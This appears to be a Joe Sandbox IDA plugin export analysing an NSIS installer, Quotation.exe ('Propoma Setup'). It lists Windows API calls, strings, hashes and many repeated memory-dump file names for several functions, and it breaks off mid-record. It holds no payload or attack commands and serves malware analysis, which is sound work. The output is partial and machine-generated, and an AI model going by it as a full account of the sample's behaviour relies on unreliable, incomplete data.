Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
Instruction ID: 54e165a9d952ab4a9c526d77f24574b80d9b4166436818e4e9d84c3548612847
Opcode Fuzzy Hash: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
Instruction Fuzzy Hash: A5D012315191607FC2501B387F0C84B7A599F65372B114B36B4A6F51E4DA348C628698

Function 00404F70 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAF
ShowWindow.USER32(?), ref: 00404FD9
GetWindowLongW.USER32(?,000000F0), ref: 00404FEA
ShowWindow.USER32(?,00000004), ref: 00405006
GetDlgItem.USER32(?,00000001), ref: 0040512D
GetDlgItem.USER32(?,00000002), ref: 00405137
SetClassLongW.USER32(?,000000F2,?), ref: 00405151
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519F
GetDlgItem.USER32(?,00000003), ref: 0040524E
ShowWindow.USER32(00000000,?), ref: 00405277
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040528B
KiUserCallbackDispatcher.NTDLL(?), ref: 0040529F
EnableWindow.USER32(?), ref: 004052B7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CE
EnableMenuItem.USER32(00000000), ref: 004052D5
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E6
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FD
lstrlenW.KERNEL32(Propoma Setup: Installing,?,Propoma Setup: Installing,00000000), ref: 0040532E

Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll,?,?,?), ref: 0040604E

SetWindowTextW.USER32(?,Propoma Setup: Installing), ref: 00405346

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

DestroyWindow.USER32(?,00000000), ref: 0040538E
CreateDialogParamW.USER32(?,?,-007A8560), ref: 004053C2

Part of subcall function 004054F8: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405512

GetDlgItem.USER32(?,000003FA), ref: 004053EB
GetWindowRect.USER32(00000000), ref: 004053F2
ScreenToClient.USER32(?,?), ref: 004053FE
SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405417
ShowWindow.USER32(00000008,?,00000000), ref: 00405436

Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

ShowWindow.USER32(?,0000000A), ref: 0040547C

Strings

Propoma Setup: Installing, xrefs: 0040531C, 00405329, 00405340

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
String ID: Propoma Setup: Installing
API String ID: 162979904-2385142604
Opcode ID: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
Instruction ID: 456415ec42eff5e8f6a9a9f0208e2dc106d0a6226250255d67da48920511729f
Opcode Fuzzy Hash: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
Instruction Fuzzy Hash: 38D1C071904B10ABDB20AF21EE44A6B7B68FB89355F00853EF545B21E1CA3D8851CFAD

Function 00405A1C Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 225
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004068C4: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
Part of subcall function 004068C4: GetProcAddress.KERNEL32(00000000), ref: 004068EE

lstrcatW.KERNEL32(1033,Propoma Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Propoma Setup: Installing,00000000,00000002,00000000,74DF3420,00000000,74DF3170), ref: 00405A9F
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,007B3800,1033,Propoma Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Propoma Setup: Installing,00000000,00000002,00000000), ref: 00405B23
lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,007B3800,1033,Propoma Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Propoma Setup: Installing,00000000), ref: 00405B38
GetFileAttributesW.KERNEL32(Call), ref: 00405B43
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,007B3800), ref: 00405B8C

Part of subcall function 004065FD: wsprintfW.USER32 ref: 0040660A

RegisterClassW.USER32(007A74E0), ref: 00405BD1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE8
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1D
ShowWindow.USER32(00000005,00000000), ref: 00405C4F
GetClassInfoW.USER32(00000000,RichEdit20W,007A74E0), ref: 00405C7A
GetClassInfoW.USER32(00000000,RichEdit,007A74E0), ref: 00405C87
RegisterClassW.USER32(007A74E0), ref: 00405C94
DialogBoxParamW.USER32(?,00000000,00404F70,00000000), ref: 00405CAF

Strings

Propoma Setup: Installing, xrefs: 00405A4F, 00405A5A, 00405A7A, 00405A84, 00405A99
tz, xrefs: 00405B94
1033, xrefs: 00405A3F, 00405A63, 00405A9A
RichEd20, xrefs: 00405C55
Call, xrefs: 00405AE4, 00405AED, 00405AFE, 00405B52, 00405B58
RichEdit, xrefs: 00405C81
.DEFAULT\Control Panel\International, xrefs: 00405A8A
RichEdit20W, xrefs: 00405C74, 00405C8A
.exe, xrefs: 00405B32
_Nb, xrefs: 00405BB0, 00405C17
Control Panel\Desktop\ResourceLocale, xrefs: 00405A5C
RichEd32, xrefs: 00405C63

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$Call$Control Panel\Desktop\ResourceLocale$Propoma Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$tz
API String ID: 1975747703-1112259717
Opcode ID: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
Instruction ID: 09b92c81f8f4ef2e2e9fd8d830fcc712f1cdd6db1c368b512ccdb95b409c048d
Opcode Fuzzy Hash: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
Instruction Fuzzy Hash: 31611370604604BEE7107B65AD42F2B366CEB46748F11813EF941B61E2EB3CA9108FAD

Function 0040154A Relevance: 35.4, APIs: 17, Strings: 3, Instructions: 441
stringtimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 004015F1
Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
SetForegroundWindow.USER32 ref: 00401634
ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
SetCurrentDirectoryW.KERNELBASE(00000000,007B4000,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll,00000000,000000F0,?,?,00000000,00000000), ref: 004017A3
MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
lstrcatW.KERNEL32(00000000,00000000,Call,007B4000,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,007B4000,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
SetFileTime.KERNELBASE(?,?,00000000,?,?,?,00000000,00000000,000000EA,?,Call,40000000,00000001,Call,00000000,00000000), ref: 00401A5A
CloseHandle.KERNELBASE(?,?,?,00000000,00000000), ref: 00401A61
lstrcatW.KERNEL32(Call,?,Call,000000E9,?,?,00000000,00000000), ref: 00401A82

Strings

Call, xrefs: 004018FC, 00401906, 00401913, 00401925, 00401933, 00401968, 0040197C, 004019A2, 004019EA, 00401A7A, 00401A81, 00401A8B, 00401A96
C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll, xrefs: 00401789, 004017F8, 00401823, 004019B1, 004019D2
C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp, xrefs: 00401998, 004019BB

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
String ID: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp$C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll$Call
API String ID: 3895412863-1010968802
Opcode ID: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
Instruction ID: f97e61f8377ab9e25a0dd965f2557d34b91b3991d6c9f65f1b163fc05bb86adc
Opcode Fuzzy Hash: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
Instruction Fuzzy Hash: 6AD1D571644301ABC710BF66CD85E2B76A8AF86758F10463FF452B22E1DB7CD8019A6F

Function 004033CB Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 178
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033DE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA

Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00403444
GlobalAlloc.KERNELBASE(00000040,?), ref: 0040359E

Strings

Null, xrefs: 004034CC
soft, xrefs: 004034C2
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033D1
C:\Users\user\Desktop\Quotation.exe, xrefs: 004033E9, 004033F3, 00403407, 00403424
Inst, xrefs: 004034B8
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040361E
Error launching installer, xrefs: 0040341A

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\Desktop\Quotation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2887414019
Opcode ID: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
Instruction ID: 8295773d5102a3db2c924d587f32f5b95c2827ef7f93a52122a4f4d2b553c90e
Opcode Fuzzy Hash: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
Instruction Fuzzy Hash: B951D371904300AFD720AF25DD81B1B7AA8BB8471AF10453FF955B62E1CB3D8E548B6E

Function 00405E98 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FC2

Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05

Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A0), ref: 00406D90
Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A0), ref: 00406DA4
Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A0), ref: 00406DBC

GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll,?,?,?), ref: 00405FD5
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll,?,?,?), ref: 0040604E
lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll,?,?,?), ref: 004060A8

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405F8D
Call, xrefs: 00405EBA, 00405F88, 00405FAC, 00405FC1, 00405FD4, 00405FE7, 00406014, 0040604D, 00406054, 00406070, 00406083, 00406091, 004060A1, 004060A7, 004060CE, 004060EA
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406048
Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll, xrefs: 00405EF3

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4187626192-3964404881
Opcode ID: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
Instruction ID: e5fb9ae88836c379eadb94168964a2c41ebb3bf79b6cd8bfde1838e31315b013
Opcode Fuzzy Hash: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
Instruction Fuzzy Hash: 0E6115716442159BDB24AB288C40A3B76A4EF99350F11853FF982F72D1EB3CC9258B5E

Function 00405D18 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll,?,00000000,?,?), ref: 00405D4A
lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll,?,00000000,?,?), ref: 00405D5C
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll,?,00000000,?,?), ref: 00405D77
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll), ref: 00405D8F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405DB6
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DD1
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405DDE

Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll,?,?,?), ref: 0040604E

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll, xrefs: 00405D35, 00405D43, 00405D49, 00405D71, 00405D76, 00405D7E, 00405D88

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll
API String ID: 1759915248-988869585
Opcode ID: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
Instruction ID: eb00d4876afd5f62942919e2a46038e7a2417e41af97232aca8a81e0ace8ac77
Opcode Fuzzy Hash: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
Instruction Fuzzy Hash: C7212672A056206BC310AF598D44E5BBBDCFF95310F04443FF988B3291C7B89D018BAA

Function 00403148 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004031B6
GetTickCount.KERNEL32 ref: 00403248
MulDiv.KERNEL32(?,00000064,?), ref: 00403278
wsprintfW.USER32 ref: 00403289

Part of subcall function 00403131: SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F

Strings

<Py, xrefs: 0040321B
... %d%%, xrefs: 00403283

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

